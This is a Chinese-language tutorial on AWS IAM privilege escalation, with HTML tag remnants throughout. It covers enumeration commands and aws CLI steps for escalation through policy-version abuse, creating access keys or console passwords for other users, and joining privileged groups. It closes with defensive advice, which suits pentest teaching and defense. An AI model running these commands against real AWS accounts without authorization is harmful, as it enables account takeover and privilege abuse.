AWS IAM 权限提升场景与利用技术详解<\/h1>

1. IAM 基础概念<\/h2>

1.1 IAM 概述<\/h3>

AWS IAM (Identity and Access Management) 是 AWS 的身份和访问管理服务，主要功能包括：<\/p>

用户管理<\/strong>：创建和管理具有独立凭据的 IAM 用户<\/li>
组管理<\/strong>：将用户分组并分配统一权限<\/li>
权限管理<\/strong>：通过策略定义访问控制规则<\/li>
角色管理<\/strong>：为 AWS 服务或实体分配临时安全身份<\/li>

多因素认证(MFA)<\/strong>：增强账户安全性<\/li> <\/ul>
1.2 sts:AssumeRole 操作<\/h3>
sts:AssumeRole<\/code> 是 AWS STS (Security Token Service) 的关键 API 操作：<\/p>
允许实体临时获取另一角色的权限<\/li> 生成临时安全凭证（访问密钥、会话令牌和到期时间）<\/li> 主要应用场景：跨账户访问<\/li> 权限委派<\/li> 临时权限提升<\/li> <\/ul> <\/li> <\/ul> 信任策略示例<\/strong>：<\/p> { <\/span><\/span> "Version"<\/span>: "2012-10-17"<\/span>, <\/span><\/span> "Statement"<\/span>: [ <\/span><\/span> { <\/span><\/span> "Effect"<\/span>: "Allow"<\/span>, <\/span><\/span> "Principal"<\/span>: { <\/span><\/span> "AWS"<\/span>: "arn:aws:iam::123456789012:user\/Susan"<\/span> <\/span><\/span> }, <\/span><\/span> "Action"<\/span>: "sts:AssumeRole"<\/span> <\/span><\/span> } <\/span><\/span> ] <\/span><\/span>} <\/span><\/span><\/code><\/pre>2. IAM 枚举技术<\/h2> 2.1 基本枚举命令<\/h3> # 获取账户授权详情<\/span> <\/span><\/span>aws iam get-account-authorization-details <\/span><\/span> <\/span><\/span># 列出所有用户<\/span> <\/span><\/span>aws iam list-users <\/span><\/span> <\/span><\/span># 获取特定用户信息<\/span> <\/span><\/span>aws iam get-user --user-name <username> <\/span><\/span> <\/span><\/span># 列出用户内联策略<\/span> <\/span><\/span>aws iam list-user-policies --user-name <username> <\/span><\/span>aws iam get-user-policy --user-name <username> --policy-name <policyname> <\/span><\/span> <\/span><\/span># 列出用户附加策略<\/span> <\/span><\/span>aws iam list-attached-user-policies --user-name <username> <\/span><\/span><\/code><\/pre>2.2 自动化枚举工具<\/h3> 推荐工具：bf-aws-permissions<\/a><\/p> 3. IAM 权限提升技术<\/h2> 3.1 SetDefaultPolicyVersion 漏洞<\/h3> 漏洞原理<\/strong>：<\/p> 允许将指定策略版本设为默认版本<\/li> 通过设置包含广泛权限的策略版本实现权限提升<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 识别可修改的策略<\/li> 创建或识别具有高权限的策略版本<\/li> 设置为默认版本<\/li> <\/ol> aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2 <\/span><\/span><\/code><\/pre>3.2 CreatePolicyVersion 漏洞<\/h3> 漏洞原理<\/strong>：<\/p> 创建新策略版本时使用--set-as-default<\/code>参数<\/li> 绕过iam:SetDefaultPolicyVersion<\/code>权限限制<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 准备高权限策略文档（如管理员策略）<\/li> 创建新策略版本并直接设为默认<\/li> <\/ol> aws iam create-policy-version --policy-arn <target_policy_arn> \ <\/span><\/span><\/span><\/span>--policy-document file:\/\/\/path\/to\/administrator\/policy.json --set-as-default <\/span><\/span><\/code><\/pre>管理员策略示例<\/strong>：<\/p> { <\/span><\/span> "Version"<\/span>: "2012-10-17"<\/span>, <\/span><\/span> "Statement"<\/span>: [ <\/span><\/span> { <\/span><\/span> "Effect"<\/span>: "Allow"<\/span>, <\/span><\/span> "Action"<\/span>: "*"<\/span>, <\/span><\/span> "Resource"<\/span>: "*"<\/span> <\/span><\/span> } <\/span><\/span> ] <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.3 CreateAccessKey 漏洞<\/h3> 漏洞原理<\/strong>：<\/p> 为目标用户创建新的访问密钥<\/li> 获取Access Key ID和Secret Access Key实现完全控制<\/li> <\/ul> 利用方法<\/strong>：<\/p> aws iam create-access-key --user-name <target_user> <\/span><\/span><\/code><\/pre>3.4 CreateLoginProfile & UpdateLoginProfile 漏洞<\/h3> 漏洞原理<\/strong>：<\/p> 为目标用户设置或修改AWS控制台登录密码<\/li> 直接通过控制台访问目标账户<\/li> <\/ul> 利用方法<\/strong>：<\/p> 创建登录配置：<\/p> aws iam create-login-profile --user-name <target_user> \ <\/span><\/span><\/span><\/span>--no-password-reset-required --password '<password>'<\/span> <\/span><\/span><\/code><\/pre>更新登录配置：<\/p> aws iam update-login-profile --user-name <target_user> \ <\/span><\/span><\/span><\/span>--no-password-reset-required --password '<password>'<\/span> <\/span><\/span><\/code><\/pre>3.5 AddUserToGroup 漏洞<\/h3> 漏洞原理<\/strong>：<\/p> 将用户添加到高权限组<\/li> 继承该组的所有权限<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 识别高权限组<\/li> 将自身用户添加到该组<\/li> <\/ol> # 列出组附加策略<\/span> <\/span><\/span>aws iam list-attached-group-policies --group-name <group_name> <\/span><\/span> <\/span><\/span># 添加用户到组<\/span> <\/span><\/span>aws iam add-user-to-group --group-name <group_name> --user-name <username> <\/span><\/span><\/code><\/pre>4. 防御措施<\/h2> 最小权限原则<\/strong>：仅授予必要权限<\/li> 策略版本控制<\/strong>：严格管理策略版本<\/li> 定期审计<\/strong>：检查异常策略修改<\/li> 监控关键操作<\/strong>：如CreateAccessKey、SetDefaultPolicyVersion等<\/li> 使用条件限制<\/strong>：在策略中添加时间、IP等条件限制<\/li> 启用MFA<\/strong>：对敏感操作要求多因素认证<\/li> <\/ol> 5. 参考资源<\/h2> AWS IAM 官方文档<\/a><\/li> AWS Privilege Escalation Methods<\/a><\/li> bf-aws-permissions 工具<\/a><\/li> <\/ul>